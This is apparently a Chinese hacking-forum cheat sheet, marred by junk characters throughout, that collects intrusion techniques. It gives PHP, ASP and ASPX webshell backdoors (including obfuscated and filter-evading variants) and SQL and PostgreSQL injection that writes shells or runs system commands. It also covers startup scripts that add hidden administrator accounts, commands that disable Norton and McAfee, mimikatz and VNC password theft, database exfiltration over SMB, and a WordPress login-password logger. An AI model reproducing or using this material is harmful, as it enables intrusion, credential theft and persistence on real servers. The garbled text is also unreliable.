SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: E4 g/ t# Q8 b' e9 C5 j1 Caccess中导出shell5 \# o% T! Q  C! G3 j9 @

8 L. P# q* D( I4 l1 v中文版本操作系统中针对mysql添加用户完整代码:
' J2 }" N5 p( ?( n% _) X7 Q
3 ^8 m- ?2 w8 `) Yuse test;! D6 u; A$ q1 D; p
create table a (cmd text);8 ]9 M7 g' \$ P3 q0 g: k
insert into a values ("set wshshell=createobject (""wscript.shell"") " );# }2 D; Q2 N, D/ X% D! G2 M
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) w* r9 S) b( k3 B8 dinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 d* }8 v" A6 _6 |$ b. Lselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";6 L2 z; D3 U& N! e3 T3 d" H
drop table a;
, ~& _" l1 r6 ~% j( j3 \0 g2 e
; m% @6 I7 q0 I3 |英文版本:. J9 o+ K! r6 u- L$ q0 |" N5 w& ?

( n6 S  f8 v8 {6 M6 ^# \: F2 P1 Ause test;
0 r; A* |+ |, c0 {: }8 p% {create table a (cmd text);
( W! V( d+ _! o7 Cinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
% T& e1 K, A. ?0 U' a/ binsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
4 D( D& Q" h2 d+ O( N- h3 Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
5 R! k; I$ N0 r9 E/ Gselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";) e: l% `$ A$ r* ]
drop table a;* @  J" Y5 S0 b3 L) q& w' w8 P
6 A. W  n. v/ H! x! O2 g
create table a (cmd BLOB);
; `3 {- H8 V5 w; p$ N0 X" Finsert into a values (CONVERT(木马的16进制代码,CHAR));. ^3 y8 v, K& B6 O6 c
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'4 b9 W0 K1 |7 i8 ?- g; `
drop table a;, u- w) P6 e/ Q* s# s
0 s! h2 E, P3 o  h
记录一下怎么处理变态诺顿3 E+ k) a! L* F; K
查看诺顿服务的路径
% a( n, }3 X; D9 T8 R! A, t! ]sc qc ccSetMgr! z/ u' r, d2 c( Y1 [7 @# P$ d
然后设置权限拒绝访问。做绝一点。。- B2 _! ]6 W8 y9 {8 p" ]2 K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
2 \# X# g) }' Q  l) c5 l3 ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER": {- R" C# [& x. ]+ u  x# d$ [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
! |+ w4 S% K1 v. E4 Zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone  Q' Q* G$ ^$ Q$ ^& ?
2 G( b  F9 J* @8 b4 X2 m
然后再重启服务器3 i' B9 w( H6 m+ B, ~; m3 {
iisreset /reboot1 i0 I# u/ @% K' n" g6 N
这样就搞定了。。不过完事后。记得恢复权限。。。。# c- X' N5 j+ Q& i2 {/ g2 R; S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
& l) P# ^) }7 u8 Qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F6 f8 C, q$ K) q' x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
- p$ q' t& B8 Z7 m6 Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
3 C) Z( ?" ^7 fSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin! ?/ l3 \4 j  p" X
2 |; o0 k( v5 H* r) K/ ^
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')' M  I2 S% g+ W& G$ E

' q; v) P+ y6 _" D, lpostgresql注射的一些东西
4 F  }4 \3 B4 v5 r1 O如何获得webshell
8 Y3 d0 Y* s' R' T. L  \  Yhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); , e# @" x) `2 R6 i
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
# J; n* G2 x& f1 f& F2 q0 Z4 ]http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;0 ]& N* _  ?9 Q7 _
如何读文件8 c8 `- I% m' I7 n3 a; Y" ~0 A; q: x
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
: R$ x, \) b* O. Q$ xhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
% S. y0 q. ^% Ahttp://127.0.0.1/postgresql.php?id=1;select * from myfile;  s7 n8 f3 C6 n$ h5 H0 I' k, q8 W

  V$ B0 d2 w5 d/ J. l" uz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
3 ~0 s& W# }5 ?* V; y当然,这些的postgresql的数据库版本必须大于8.X
, _1 u4 d* x' n' }0 T" k创建一个system的函数:
5 w2 M# Y3 y. q& ECREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
  k% G' Q: O- _9 U6 ^/ c
% _7 V" [' i5 P5 V# M创建一个输出表:
) m* C2 t3 U0 E$ [6 D; t: t- @1 {  w- pCREATE TABLE stdout(id serial, system_out text)% T9 x/ j+ W: r3 a( D! ~! T
. |. V3 k2 ]/ f, i5 T
执行shell,输出到输出表内:
4 i# k" l# i% K- Z# ?/ o1 m8 j3 tSELECT system('uname -a > /tmp/test')
) U* X) \( h) X% D; H# P, E+ C- B0 [; S
copy 输出的内容到表里面;
$ H4 F* O' }* MCOPY stdout(system_out) FROM '/tmp/test'6 L3 X+ N+ r3 U, D4 U

+ k+ I/ a$ v2 e9 t" a% B从输出表内读取执行后的回显,判断是否执行成功
) t! V2 o- E2 a0 H( V1 [9 S% I2 ]/ G; R
SELECT system_out FROM stdout4 \& F( u8 u1 N* t) X9 Z* A
下面是测试例子+ [/ I: A9 [( ~+ Z

* q+ @- D0 T6 X2 E; g: Z/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 3 ]* S3 l( t* J# ^5 W
" `3 A' _* J( X3 e
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'8 N* b/ I, Q: _1 L7 n5 Q1 U
STRICT --
+ K; r$ a) _! X$ s8 v% P; W+ I  C/ Q
/store.php?id=1; SELECT system('uname -a > /tmp/test') --8 {  P1 s" M, b

: K! j5 h8 e& j3 s/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --8 W/ |" Z% a  J! X- ^
3 h7 T' h7 r; e* c+ t% y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
$ R% t; k% l3 wnet stop sharedaccess    stop the default firewall
% H0 z+ Y4 ~. ~4 e. Anetsh firewall show      show/config default firewall
9 q/ m# V( b/ I+ T% [" t+ O8 W+ fnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall) N8 N2 Q* z( J) |. s2 E
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall5 x8 p6 ]% r# }
修改3389端口方法(修改后不易被扫出); V4 `3 M5 w" G
修改服务器端的端口设置,注册表有2个地方需要修改
0 I" n+ o1 g2 U1 j6 Q4 ?1 [, ~/ V9 \* d0 q# N# {, e, t3 {% C! y" q
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]! v# C7 ]/ L8 u$ V! o6 s. r
PortNumber值,默认是3389,修改成所希望的端口,比如6000+ o1 p2 v3 w+ I
) b+ L+ G& T* v( i( F+ |" O) y
第二个地方:
4 i8 q/ J9 f' O  j[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
/ J. {( j, L* ePortNumber值,默认是3389,修改成所希望的端口,比如6000, ]  t0 Q" \3 I9 u3 ]$ P' X0 m

9 U  W7 x. ?0 T. a7 b# S9 X/ O现在这样就可以了。重启系统就可以了! f) Z  ]- H2 ?' T' T2 e' H
: v# Z8 j- J) c( U- B/ P" [/ L+ Z
查看3389远程登录的脚本, n4 y  Z6 o- r/ ]
保存为一个bat文件5 s+ q+ h! k0 C2 M# `
date /t >>D:\sec\TSlog\ts.log
; C) I" Y5 h2 I- Ktime /t >>D:\sec\TSlog\ts.log
2 W( ?9 @; s6 b  e! p) F, @2 j! Pnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log+ M! j% }. o+ S# ?* y& w0 C9 R2 B
start Explorer5 R' M% k0 w6 Y

1 G1 V( ?4 g* C. y4 K6 ^1 m& Kmstsc的参数:, B" Y- m* ?% E/ ]3 C3 F
6 {, t% [7 Y1 Q) h' U0 k
远程桌面连接
3 d6 {7 h) ?' C: J/ p
: U0 c( ]( @6 nMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]& z: w% X6 w2 U; e9 S/ q
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 N- G- z: p+ J+ O2 ~$ F+ D% H9 O; E8 O; _$ m# }
<Connection File> -- 指定连接的 .rdp 文件的名称。% z* n1 f7 U2 y

6 ?3 J8 w. e8 X8 D/v:<server[:port]> -- 指定要连接到的终端服务器。
9 y; v8 M/ y3 ~% w  l
. h1 @9 h2 D  o, g/console -- 连接到服务器的控制台会话。
* w* z4 J' w$ Y3 l3 K& _
6 h- B9 k$ L, w1 w' k/f -- 以全屏模式启动客户端。
; j/ [6 j* I# x$ b
  B9 @2 v: A6 J$ M: a/w:<width> --  指定远程桌面屏幕的宽度。
% d* [$ d: Q# U. i! ^2 f
! S5 Z9 w5 h5 i/h:<height> -- 指定远程桌面屏幕的高度。
9 p8 l+ D  j% p+ ~5 a1 x1 j! ]) C! L; g" S
/edit -- 打开指定的 .rdp 文件来编辑。3 M. k3 f& v# b* `# Z0 [5 l5 D3 I

% R% A; y& ?" s- z& m' X/migrate -- 将客户端连接管理器创建的旧版% ^( X& A% U2 x9 F4 J' H* [
连接文件迁移到新的 .rdp 连接文件。6 N- Z: Q, L: t' Z4 n0 g  ?$ R

+ Q( [; Z4 s5 Z5 p
: a; f  k9 Q7 l; S/ q) n其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
; |% N5 B& H! i% O! `* ~- fmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
# i5 C( S- Y% P. D" u
0 ~7 S7 o8 F" F, {+ u7 t命令行下开启3389+ u; S! x5 O, K+ L$ M+ L- t
net user asp.net aspnet /add
  \- M0 J3 U" w2 o5 [, Znet localgroup Administrators asp.net /add
% a# m0 d1 |( f# j! d# l! qnet localgroup "Remote Desktop Users" asp.net /add) X8 c* C  C- f* U5 g
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
* M7 w$ i: ?: A# ]3 s' fecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
! R/ P( F. y; N7 @4 q* J  S4 f& Cecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1; |$ G7 R- ?! {8 D& _2 @  T
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f$ A6 o; t5 h) A. u& u9 d
sc config rasman start= auto/ D6 m# R' d- w  f3 j! \. l2 z
sc config remoteaccess start= auto
+ W. d! E6 c8 ?* Q5 N( @4 Lnet start rasman. x+ `% [  d% m+ ?$ }8 M
net start remoteaccess
1 y- G) ^. m  d5 `Media
  n; N& ~& x) |  `<form id="frmUpload" enctype="multipart/form-data"
+ z! C9 U) h7 _7 R, M6 M% raction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>/ W' {  c. P9 c. X
<input type="file" name="NewFile" size="50"><br>
" t4 o. e3 v3 C9 M$ g<input id="btnUpload" type="submit" value="Upload">7 s  g$ }; t0 |2 h
</form>, w8 v" m& k( r9 C  O

+ X: S! w; B/ W/ n0 c, Q! o" Hcontrol userpasswords2 查看用户的密码+ }8 d8 N# q) Y4 e6 o& J+ `, P
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
$ f$ m1 R2 C$ d2 t0 i' ~% PSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: t! c8 y3 E8 d1 B
4 @: J- `5 ^9 l9 J" W. m141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
8 F/ t- e. x8 \+ s测试1:0 K  h0 e, U0 O; ~- ~9 f
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t18 q& S! S, a8 [

' v+ R* z3 C% m! L, w7 L3 l; i0 T. b测试2:# l: v. l0 [2 q' M& m
9 E/ L+ W4 H8 F. r: Q  f
create table dirs(paths varchar(100),paths1 varchar(100), id int)
$ y* H* b$ ]1 T  E, \) _
& I6 X4 ^5 t4 f* r9 J9 ]9 jdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--! z) ?- V3 v! _) A. U/ ^

# C' G$ ]# p. j0 I$ G, P5 ]" ?SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
/ F( p5 i4 _2 c: ^5 O7 Z; ?2 e关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令2 r6 q; X* R* D9 x4 H/ ?4 o
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;. |! K% m& C; u$ N" l( a; P
net stop mcafeeframework
4 c, f1 {8 _. t# W) x; }net stop mcshield: P+ k* o1 `. L& K
net stop mcafeeengineservice
3 o# M" m" g0 @0 M, {* \net stop mctaskmanager
  L+ R0 d7 a) w: A8 H! s0 jhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D8 p1 K% `0 q0 k# u7 d

  y* \0 E# k& k. b: @  VNCDump.zip (4.76 KB, 下载次数: 1) # ?6 {# M9 z! m
密码在线破解http://tools88.com/safe/vnc.php
; X+ q5 n# `3 H) u1 g% F, P9 S  k4 SVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
: r& [/ ]  a) ^( ^* U2 }% C
9 J: K' y) b) l+ Qexec master..xp_cmdshell 'net user'
3 j$ A- X0 M2 _mssql执行命令。  V; T8 f; r" O1 `  X
获取mssql的密码hash查询
1 Z/ H4 J- Y: O/ }4 k: P  E7 fselect name,password from master.dbo.sysxlogins; A; }, O: H  ]( {

! G0 B7 l% G  ^' S( zbackup log dbName with NO_LOG;0 r. T3 r$ r/ A- F+ j! D, l+ r
backup log dbName with TRUNCATE_ONLY;) X* ~* G$ {2 b+ y! x' i
DBCC SHRINKDATABASE(dbName);% T8 L/ x4 g& }4 u# l! K4 F
mssql数据库压缩
, h+ E) t* D# {- q- q- @8 M7 m
4 l% j$ }9 l4 e4 [/ vRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
, A! f3 C( {* t1 A7 ~0 K6 I7 [将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。: X5 j4 m% P: r$ l) o5 f5 M/ C

, c- C& ~5 ^& ybackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
6 m8 ?  b# p! u1 o! N9 g; e* S/ S备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
! {9 o1 B$ {2 O8 Z7 E* o4 F4 K7 L1 [) ~" y- ^: z
Discuz!nt35渗透要点:9 }0 w: J, }, N1 Y  K2 v4 D1 n
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
, f. t: F" F( s- b4 V+ P% r(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
# v9 T& t8 d, w* k# h$ ]; c(3)保存。
+ h: }9 h8 U$ j+ b8 L/ {(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass$ H4 E6 |6 I8 e  ]7 J
d:\rar.exe a -r d:\1.rar d:\website\# b8 Y/ {- b6 w. l$ I
递归压缩website, a, m  _8 O; a4 U# \5 S6 v  }/ a2 r3 ?
注意rar.exe的路径
; a1 H' p+ O3 {4 t  W, c7 c$ B0 Y( n/ z0 x, t2 i3 Y
<?php$ l6 [$ G4 F; k8 ^# C$ y/ O/ k
4 v' Q3 }$ j- D) \$ z
$telok   = "0${@eval($_POST[xxoo])}";9 F( ?& X5 S& f) ]* f* x3 P

; B& j( d$ F. F  Z$username   = "123456";$ u6 c! S/ A5 l! @! Z7 B. k
: r- _# @4 i$ C1 ?8 }7 }
$userpwd   = "123456";
  @& `/ j! k: ^1 d. }1 i+ L, `
2 j/ r% H, y8 Z$telhao   = "123456";* a0 x& _, E  p  `* S
1 [8 R- A8 C* Z" d2 }  X- ^
$telinfo   = "123456";# p1 V  J4 y5 U9 a0 E& x' `/ N
8 R. u0 f% c1 ^, C, k
?>2 \  p- \5 i4 p7 V3 j9 @( V
php一句话未过滤插入一句话木马+ u* e% U5 X: i  R+ @' b. `
  o9 z, L( u4 `- u
站库分离脱裤技巧
8 M9 b0 Z" s6 Y4 x2 Pexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
: @. e9 e9 @+ qexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
+ P! D; Q; F! ?( E$ P7 Y9 M$ _条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
8 C' C; B! j! O' ^这儿利用的是马儿的专家模式(自己写代码)。* w9 W( ]8 |2 j: [! x
ini_set('display_errors', 1);
! G' @& D2 ]' r4 P) X" n9 j; E1 qset_time_limit(0);6 u6 M* ~. A9 H
error_reporting(E_ALL);
+ O; H) _" t9 {/ ^( h9 ]5 I$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
9 k. ~- T( {! v7 |mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
1 k+ z" N: y! B# R# O9 D1 B7 q$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());: D# {3 ^; K3 Y
$i = 0;
: k7 Y5 {# G; p3 n$ o0 [8 z1 ]- J$tmp = '';
6 E4 I& G4 w; d  o2 n! C6 G* dwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
( S# J  W# [' d- q" B- H2 [    $i = $i+1;# e% U3 I8 [  }# V4 \. p5 |  b3 g7 k
    $tmp .=  implode("::", $row)."\n";1 t" E4 |# x2 P+ v# G9 r
    if(!($i%500)){//500条写入一个文件: d4 @( b4 c9 u6 L# p# K$ v
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
0 d6 H+ p9 Q( t: H4 J        file_put_contents($filename,$tmp);3 b, B) A8 I# j3 p# t
        $tmp = '';1 Z' Y8 Z4 h) L
    }0 r( Q! X; I+ W/ Y  f9 X' G( [
}( z! }( w" Q" o' {; Y1 ]/ p2 [! x+ L- B
mysql_free_result($result);/ M9 Z& s/ ?/ K& z( D3 K

* m; `! Y2 o# Z" n* T+ D& O( I+ B
0 i, z9 o& c1 c; D* T, ?4 s% y/ ]4 T  T+ x$ V
//down完后delete% C5 [- k) U# |' q

7 e" c4 l: U4 F: U" f+ x+ f$ i/ p3 ?# W+ R- c% u8 M  Z
ini_set('display_errors', 1);
( s' R9 d% [1 X5 i4 z5 H+ Terror_reporting(E_ALL);
' @" h2 d' o5 H% a5 K$i = 0;
5 Z* h7 Y8 T3 X. V& p6 |7 Q! Lwhile($i<32) {2 @! I" j0 s7 s+ b* A
    $i = $i+1;
  n% K) Y9 {2 c$ l3 P2 q1 `, n        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
9 q! A/ J; C) D3 w- J/ N5 g8 m        unlink($filename);
4 n* R2 }6 x& N' W} ; A$ J  ?4 f$ C; k$ H: ^! Q9 d; w, D
httprint 收集操作系统指纹
5 ^( ?$ ^/ b+ ?; i3 V扫描192.168.1.100的所有端口
/ J  B7 P5 H- U- ~- _nmap –PN –sT –sV –p0-65535 192.168.1.100* x- c7 j- z7 J8 n9 z
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
' t# m' k; U. Rhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输+ a  Y" o7 |9 c! o
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
6 N. j, Q9 P% H, U! y& N. A. d& x  }4 o8 s" f
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
2 v7 c( b6 [$ r  |, b$ k* H/ z$ A* ~
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
( l! A- x3 U" k- o) E1 j
( m- G, U! _  A: @. H2 ?# H: }  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
( h! Y' F9 O/ f1 ]9 r8 I" \  _0 Z
9 _- I5 B, X3 x7 i7 j$ n# J& Y6 Z5 t  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
7 {) q8 {7 x' Z: m  [
) q, w, a3 ~4 N  http://net-square.com/msnpawn/index.shtml (要求安装)" z5 e, I: n+ U; r* o

7 d& v# X. k7 D, S4 b& K$ H7 o' S  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
1 ^0 {- l/ ^5 ^) o& ^1 n
% I( `7 d% W/ q' U- @1 p% h* q$ M  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
, N; T2 H0 J/ Y$ ~: z5 w- lset names gb23126 L2 ~, y/ ^  h  F+ a
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。) g8 E* @! b' E- ]9 L
3 ], }# L/ Z! d7 M% H
mysql 密码修改6 y$ j" q) W$ p# b
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
( H  r, F! O3 |0 nupdate user set password=PASSWORD('antian365.com') where user='root';
" C7 j7 ^( Y* w$ j# t) _. aflush privileges;
9 I# J0 v# w" `- G, B; Q高级的PHP一句话木马后门9 l/ c, m2 a. F& A1 o, x! y- s7 p

1 F$ x% \5 c% \- T7 ~. |1 L8 G入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀; l: n' x! v% p
# X7 d4 _; a7 l
1、
( X* z0 I5 S; m. q9 ~8 a/ H# m5 c  z0 T5 S8 J; W) ]/ i
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
! J0 M+ ^  m/ r7 k
" D5 A; j4 _- m! m; @  g+ N( b  K$hh("/[discuz]/e",$_POST['h'],"Access");
6 V1 a7 u7 t9 t- l  x+ R
# \0 _* E- `$ Q" ], C  u3 z1 u//菜刀一句话
# e0 h! D7 {0 S2 l8 E4 B, l) E# j
2、. D9 ^1 M0 \( X! w/ b4 M) t7 r( E" `

& _3 x& |/ y8 t$filename=$_GET['xbid'];
8 w! ~+ o/ q: H3 k2 {! V% J
# {; Q; B1 ~& O- f! Y9 Zinclude ($filename);& C5 ~- p8 H% P+ p* s! E* c, [& p
8 ~+ B  F9 f% a/ F1 O4 e+ r
//危险的include函数,直接编译任何文件为php格式运行4 v  `2 \8 l2 K

8 F: J5 |3 I; C6 r9 x- N3、% U0 z& G( P! F0 Y& |
( h( E  [) I% h0 e$ H
$reg="c"."o"."p"."y";1 K5 ?8 V" a+ z/ \

/ l+ y+ m+ d2 x$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
9 G0 w4 B4 X: m$ r% Y! S6 ^) J; _/ m3 U
//重命名任何文件
5 |! K& n  m  ^% D* E7 w' h1 d) J5 K2 ~( i% s
4、
! u! @7 F3 ^4 y& u1 x3 A; k7 E
+ \3 f- W$ h* K, z0 e0 u$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";4 G7 U, }+ F9 Y

; q- r) v% F3 I, ^( P1 m+ W$gzid("/[discuz]/e",$_POST['h'],"Access");6 d1 T( L' Y% f4 c; q
) F3 J' T: n" `# I% ~" X' r
//菜刀一句话
$ z) n3 k$ A$ X0 m$ Q( I5 `. t: X  ?# p0 g  k
5、include ($uid);7 p' ^9 x, a! v
+ L1 p( o7 s' g
//危险的include函数,直接编译任何文件为php格式运行,POST * J4 [" d" f2 Y8 h9 b
( L+ p% D9 [" \3 U
  l2 U, `* F  ^6 T
//gif插一句话# s: d/ q: {  \' z$ [7 J6 @
( b& M$ |0 W) c, F* Z5 I
6、典型一句话( ~+ p6 f4 `6 D; S
- @& T8 N2 a. u1 B+ l
程序后门代码/ x% f' O' ?: T8 u
<?php eval_r($_POST[sb])?>
3 W+ ~# ]7 F' X# @程序代码1 c+ U$ a8 ^5 ]/ K5 t
<?php @eval_r($_POST[sb])?>
5 U7 e" Q4 b2 ]# W% t/ c: y//容错代码! V3 u* j* H+ r5 `
程序代码+ j5 Y! J! I" y* o3 N7 b; d6 {
<?php assert($_POST[sb]);?>0 C, J3 N- ?+ i! A
//使用lanker一句话客户端的专家模式执行相关的php语句
7 z/ u; s1 s6 n% y; e0 p程序代码7 q+ C/ Z; y' [7 \% I$ s1 d' J
<?$_POST['sa']($_POST['sb']);?>) |) i0 [" ~& S5 D3 u
程序代码
7 `! N& Q+ Y: @( g0 T, M2 I<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>  q( ?# T& w  s, o
程序代码2 p. d$ O3 G. H% q, y
<?php' Y9 Q, ~4 g$ E
@preg_replace("/[email]/e",$_POST['h'],"error");$ i5 r' Y0 d+ v; |: f
?>! {" }+ ]/ J* r( e+ c9 q; K! |
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; K# B0 y0 ~) b# d, X程序代码
) o/ b+ V  T+ {  q  c* C<O>h=@eval_r($_POST[c]);</O>
" n& U3 m; S, ?  P+ p* s9 c9 L) D程序代码  ?" I3 y9 G& r3 O, K/ X5 ~# t
<script language="php">@eval_r($_POST[sb])</script>/ q( @# B7 E. n4 m
//绕过<?限制的一句话
$ w! {+ E" V7 ~3 c. [/ W* F. _9 |* p( h+ q( B' b$ p
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip" D, T- k! ?" Q: c3 z
详细用法:
# l; Z. `, U* m4 g1、到tools目录。psexec \\127.0.0.1 cmd
1 V+ J* T  W4 D2、执行mimikatz$ _' h' y7 e/ u& G
3、执行 privilege::debug: h/ O! m8 |- h3 n$ D
4、执行 inject::process lsass.exe sekurlsa.dll  ]/ t7 r! W: ^8 V8 v
5、执行@getLogonPasswords& }9 G  }; K9 w
6、widget就是密码, j; [* F- x6 y. k/ ^3 _9 v7 x' m
7、exit退出,不要直接关闭否则系统会崩溃。# G! a8 ], h; G

& R3 e( D) s0 `6 khttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面' Y) Q4 a: |3 P% _

% Z7 b* S: K. s. ]7 S自动查找系统高危补丁. S) `6 g* p  C' ~4 U! O% P
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt/ m' o8 k% S5 m5 k8 }. k

* a# e  P# c/ k  o- i4 _突破安全狗的一句话aspx后门* x9 A$ b& Y$ j5 ~1 s
<%@ Page Language="C#" ValidateRequest="false" %>
; {- k! P8 r- k' n<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
' f, g$ U; y7 W' twebshell下记录WordPress登陆密码: }0 s6 r; G, `8 e6 N
webshell下记录Wordpress登陆密码方便进一步社工0 U7 @! e' y1 d. _" J/ S. n
在文件wp-login.php中539行处添加:
- W, `% g8 Z- G+ C* \// log password
8 X9 u: y+ W( |8 N6 A- ~$log_user=$_POST['log'];
. X5 [- K& U  [7 v- o; s+ ]4 U$log_pwd=$_POST['pwd'];/ X5 s* _6 |& X. e
$log_ip=$_SERVER["REMOTE_ADDR"];$ S- l7 s& O, j: q) m" `
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;9 H+ j& J/ v* ?; C8 x
$txt=$txt.”\r\n”;6 Z$ H% I1 A+ R/ g! O* N1 l( g8 \
